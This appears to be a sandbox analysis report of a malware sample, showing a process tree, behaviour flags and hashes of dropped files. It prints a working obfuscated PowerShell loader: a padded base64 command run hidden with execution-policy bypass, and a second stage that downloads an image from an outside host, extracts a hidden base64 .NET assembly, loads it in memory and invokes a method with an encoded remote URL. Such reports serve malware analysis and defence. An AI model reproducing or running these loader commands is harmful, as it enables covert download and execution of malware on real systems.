yDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEYrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD9rJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJwrJWgRidYoNfCmÇjyD8rJWgRidYoNfCmÇjyDDwrJWgRidYoNfCmÇjyDQgBBrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDRQrJWgRidYoNfCmÇjyD2rJWgRidYoNfCmÇjyDDQrJWgRidYoNfCmÇjyDXwBTrJWgRidYoNfCmÇjyDFQrJWgRidYoNfCmÇjyDQQBSrJWgRidYoNfCmÇjyDFQrJWgRidYoNfCmÇjyDPgrJWgRidYoNfCmÇjyD+rJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDOwrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDEYrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD9rJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJwrJWgRidYoNfCmÇjyD8rJWgRidYoNfCmÇjyDDwrJWgRidYoNfCmÇjyDQgBBrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDRQrJWgRidYoNfCmÇjyD2rJWgRidYoNfCmÇjyDDQrJWgRidYoNfCmÇjyDXwBFrJWgRidYoNfCmÇjyDE4rJWgRidYoNfCmÇjyDRrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD+rJWgRidYoNfCmÇjyDD4rJWgRidYoNfCmÇjyDJwrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEkrJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDerJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDD0rJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDGkrJWgRidYoNfCmÇjyDbQBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDZQBUrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDerJWgRidYoNfCmÇjyDB0rJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDSQBurJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDZQB4rJWgRidYoNfCmÇjyDE8rJWgRidYoNfCmÇjyDZgrJWgRidYoNfCmÇjyDorJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEYrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDKQrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDZQBurJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDSQBurJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDZQB4rJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDPQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDaQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDZwBlrJWgRidYoNfCmÇjyDFQrJWgRidYoNfCmÇjyDZQB4rJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDLgBJrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHgrJWgRidYoNfCmÇjyDTwBmrJWgRidYoNfCmÇjyDCgrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBGrJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDYQBnrJWgRidYoNfCmÇjyDCkrJWgRidYoNfCmÇjyDOwrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDHMrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBhrJWgRidYoNfCmÇjyDHIrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBJrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHgrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDtrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDDrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBJrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHgrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDtrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEkrJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDerJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEkrJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDerJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCsrJWgRidYoNfCmÇjyDPQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEYrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDLgBMrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDbgBnrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDarJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDYgBhrJWgRidYoNfCmÇjyDHMrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyD2rJWgRidYoNfCmÇjyDDQrJWgRidYoNfCmÇjyDTrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZwB0rJWgRidYoNfCmÇjyDGgrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD9rJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBJrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHgrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDtrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBzrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDYQByrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDSQBurJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDZQB4rJWgRidYoNfCmÇjyDDsrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBirJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcwBlrJWgRidYoNfCmÇjyDDYrJWgRidYoNfCmÇjyDNrJWgRidYoNfCmÇjyDBDrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDbQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDPQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDaQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDZwBlrJWgRidYoNfCmÇjyDFQrJWgRidYoNfCmÇjyDZQB4rJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDLgBTrJWgRidYoNfCmÇjyDHUrJWgRidYoNfCmÇjyDYgBzrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDcgBprJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZwrJWgRidYoNfCmÇjyDorJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEkrJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDerJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDsrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBirJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcwBlrJWgRidYoNfCmÇjyDDYrJWgRidYoNfCmÇjyDNrJWgRidYoNfCmÇjyDBMrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDbgBnrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDarJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDprJWgRidYoNfCmÇjyDDsrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBjrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDbQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDEIrJWgRidYoNfCmÇjyDeQB0rJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDcwrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDD0rJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDBbrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDeQBzrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDZQBtrJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDQwBvrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDdgBlrJWgRidYoNfCmÇjyDHIrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBdrJWgRidYoNfCmÇjyDDorJWgRidYoNfCmÇjyDOgBGrJWgRidYoNfCmÇjyDHIrJWgRidYoNfCmÇjyDbwBtrJWgRidYoNfCmÇjyDEIrJWgRidYoNfCmÇjyDYQBzrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDNgrJWgRidYoNfCmÇjyD0rJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDByrJWgRidYoNfCmÇjyDGkrJWgRidYoNfCmÇjyDbgBnrJWgRidYoNfCmÇjyDCgrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBirJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcwBlrJWgRidYoNfCmÇjyDDYrJWgRidYoNfCmÇjyDNrJWgRidYoNfCmÇjyDBDrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDbQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDCkrJWgRidYoNfCmÇjyDOwrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDbwBhrJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDZQBkrJWgRidYoNfCmÇjyDEErJWgRidYoNfCmÇjyDcwBzrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDbQBirJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDeQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDD0rJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDBbrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDeQBzrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDZQBtrJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDUgBlrJWgRidYoNfCmÇjyDGYrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDGMrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBprJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDbgrJWgRidYoNfCmÇjyDurJWgRidYoNfCmÇjyDEErJWgRidYoNfCmÇjyDcwBzrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDbQBirJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDeQBdrJWgRidYoNfCmÇjyDDorJWgRidYoNfCmÇjyDOgBMrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDYQBkrJWgRidYoNfCmÇjyDCgrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBjrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDbQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDEIrJWgRidYoNfCmÇjyDeQB0rJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDcwrJWgRidYoNfCmÇjyDprJWgRidYoNfCmÇjyDDsrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDB0rJWgRidYoNfCmÇjyDHkrJWgRidYoNfCmÇjyDcrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDPQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBvrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDQQBzrJWgRidYoNfCmÇjyDHMrJWgRidYoNfCmÇjyDZQBtrJWgRidYoNfCmÇjyDGIrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDB5rJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDRwBlrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDVrJWgRidYoNfCmÇjyDB5rJWgRidYoNfCmÇjyDHrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDorJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDRgBprJWgRidYoNfCmÇjyDGIrJWgRidYoNfCmÇjyDZQByrJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDSrJWgRidYoNfCmÇjyDBvrJWgRidYoNfCmÇjyDG0rJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDnrJWgRidYoNfCmÇjyDCkrJWgRidYoNfCmÇjyDOwrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDG0rJWgRidYoNfCmÇjyDZQB0rJWgRidYoNfCmÇjyDGgrJWgRidYoNfCmÇjyDbwBkrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDPQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDB5rJWgRidYoNfCmÇjyDHrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDurJWgRidYoNfCmÇjyDEcrJWgRidYoNfCmÇjyDZQB0rJWgRidYoNfCmÇjyDE0rJWgRidYoNfCmÇjyDZQB0rJWgRidYoNfCmÇjyDGgrJWgRidYoNfCmÇjyDbwBkrJWgRidYoNfCmÇjyDCgrJWgRidYoNfCmÇjyDJwBWrJWgRidYoNfCmÇjyDEErJWgRidYoNfCmÇjyDSQrJWgRidYoNfCmÇjyDnrJWgRidYoNfCmÇjyDCkrJWgRidYoNfCmÇjyDLgBJrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDdgBvrJWgRidYoNfCmÇjyDGsrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDorJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDbgB1rJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDsrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDWwBvrJWgRidYoNfCmÇjyDGIrJWgRidYoNfCmÇjyDagBlrJWgRidYoNfCmÇjyDGMrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBbrJWgRidYoNfCmÇjyDF0rJWgRidYoNfCmÇjyDXQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCgrJWgRidYoNfCmÇjyDJwBkrJWgRidYoNfCmÇjyDEgrJWgRidYoNfCmÇjyDarJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDwrJWgRidYoNfCmÇjyDEwrJWgRidYoNfCmÇjyDbgBsrJWgRidYoNfCmÇjyDGkrJWgRidYoNfCmÇjyDWQBTrJWgRidYoNfCmÇjyDDgrJWgRidYoNfCmÇjyDerJWgRidYoNfCmÇjyDBOrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDNrJWgRidYoNfCmÇjyDB6rJWgRidYoNfCmÇjyDE0rJWgRidYoNfCmÇjyDeQrJWgRidYoNfCmÇjyD0rJWgRidYoNfCmÇjyDHkrJWgRidYoNfCmÇjyDTgBDrJWgRidYoNfCmÇjyDDQrJWgRidYoNfCmÇjyDegBPrJWgRidYoNfCmÇjyDFQrJWgRidYoNfCmÇjyDRQB2rJWgRidYoNfCmÇjyDEwrJWgRidYoNfCmÇjyDegBwrJWgRidYoNfCmÇjyDHcrJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBIrJWgRidYoNfCmÇjyDFIrJWgRidYoNfCmÇjyDbwrJWgRidYoNfCmÇjyDnrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDLrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBmrJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDZgBkrJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDsrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJwBkrJWgRidYoNfCmÇjyDGYrJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBmrJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDsrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJwBkrJWgRidYoNfCmÇjyDGYrJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBmrJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDsrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJwBkrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBzrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDJwrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCwrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDnrJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDnrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDLrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDYwB1rJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDKQrJWgRidYoNfCmÇjyDprJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('rJWgRidYoNfCmÇjyD','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnliYS8xNS4zMy4yNC4zOTEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"4⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C4NFM511JFTZ6Q00PNPC.temp
Filesize7KB
MD573a160647932d8e9196ae805eb65f335
SHA14947da7e5f0fdba23a884312be9e72e54966b760
SHA256860cd25acdeff4eed12a8c257c9959d403131566f5c72ebcd3d748d2d5963669
SHA512bfeefe848e84d1905b70b4d60d88c64bb40d181548b92783a2f4dce43f639a84b7ca8f1afd14097148ac0b8f739cd58e0b984327fa21e860940ef04c5f7424b1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD573a160647932d8e9196ae805eb65f335
SHA14947da7e5f0fdba23a884312be9e72e54966b760
SHA256860cd25acdeff4eed12a8c257c9959d403131566f5c72ebcd3d748d2d5963669
SHA512bfeefe848e84d1905b70b4d60d88c64bb40d181548b92783a2f4dce43f639a84b7ca8f1afd14097148ac0b8f739cd58e0b984327fa21e860940ef04c5f7424b1
-
Filesize
257KB
MD5a4b27b7143e37f8c1c3d038e22fab7e5
SHA10cd0ee78e4ca6594ed69b387962f5872a1125ed3
SHA256f2d370a98975e818ac6e0e52db36aaa0a29b2ac04eedc5c8b917d2ee62bc5571
SHA512ddadde2e895121fe2e3393468358bd92e1fac0fec25b980386de28357b067fb8cbe913bf2e622dcbf82120b18af7b44e4fce8bf9393b294adda5bf85c277f7d5
-
Filesize
257KB
MD5a4b27b7143e37f8c1c3d038e22fab7e5
SHA10cd0ee78e4ca6594ed69b387962f5872a1125ed3
SHA256f2d370a98975e818ac6e0e52db36aaa0a29b2ac04eedc5c8b917d2ee62bc5571
SHA512ddadde2e895121fe2e3393468358bd92e1fac0fec25b980386de28357b067fb8cbe913bf2e622dcbf82120b18af7b44e4fce8bf9393b294adda5bf85c277f7d5